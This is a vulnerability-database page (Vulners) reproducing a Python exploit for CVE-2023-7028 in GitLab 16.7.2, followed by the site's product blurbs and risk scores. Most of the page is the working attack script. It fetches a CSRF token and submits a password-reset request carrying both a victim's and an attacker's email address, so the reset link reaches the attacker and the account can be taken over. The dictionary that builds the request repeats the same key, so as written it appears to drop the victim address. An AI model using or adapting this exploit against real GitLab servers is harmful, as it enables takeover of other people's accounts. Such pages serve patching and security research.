Vulners
Lucene search
📄 GitLab 16.7.2 Account Takeover
10
# Exploit Title: GitLab 16.7.2 - Account Takeover via Password Reset
without user interactions
# Date: 2025-04-16
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Contact: [email protected]
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
# MiRROR-H: https://mirror-h.org/search/hacker/49626/
# Version: = 16.7.2
# Tested on: Win, Ubuntu
# CVE : CVE-2023-7028
#!/usr/bin/env python3
import argparse
import re
import requests
import os
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
session = requests.Session()
def grab_token(url):
headers =
{"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8","Upgrade-Insecure-Requests":"1","User-Agent":"Mozilla/5.0
(Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101
Firefox/121.0","Referer":""+url+"/users/sign_in","Connection":"close","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip,
deflate, br"}
cookies = {"preferred_language":"en"}
response = session.get(""+url+"/users/password/new",
headers=headers,verify=False)
pattern = r'<meta name="csrf-token" content="(.+?)" />'
match = re.findall(pattern, response.text)
if match:
token = match[0]
print(f'The CSRF token is: {token}')
return token
else:
print('Error: CSRF token not found in the HTML content')
exit()
def reset_password(url,token,victim,attacker):
paramsPost =
{"user%5Bemail%5D":victim,"user%5Bemail%5D":attacker,"authenticity_token":token}
headers =
{"Origin":""+url+"","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8","Upgrade-Insecure-Requests":"1","User-Agent":"Mozilla/5.0
(Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101
Firefox/121.0","Referer":""+url+"/users/password/new","Connection":"close","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip,
deflate, br","Content-Type":"application/x-www-form-urlencoded"}
response = session.post(""+url+"/users/password", data=paramsPost,
headers=headers,verify=False)
if "If your email address exists " in response.text:
print("Check if you have a new password reset email")
else:
print("Possible not vuln")
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url", required=False, default="
http://gitlab.lan",help="URL of host to check will need http or https")
parser.add_argument("-v", "--victim",
default="[email protected]",required=True,
help="victim email address")
parser.add_argument("-a", "--attacker",
default="[email protected]",required=True,
help="attacker email address")
parser.add_argument("-p", "--proxy", default="",required=False, help="Proxy
for debugging")
args = parser.parse_args()
url = args.url
victim = args.victim
attacker = args.attacker
if args.proxy:
http_proxy = args.proxy
os.environ['HTTP_PROXY'] = http_proxy
os.environ['HTTPS_PROXY'] = http_proxy
if url:
token = grab_token(url)
reset_password(url,token,victim,attacker)Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
21 Apr 2025 00:00Current
9.1High risk
Vulners AI Score9.1
CVSS 3.19.8 - 10
EPSS0.93426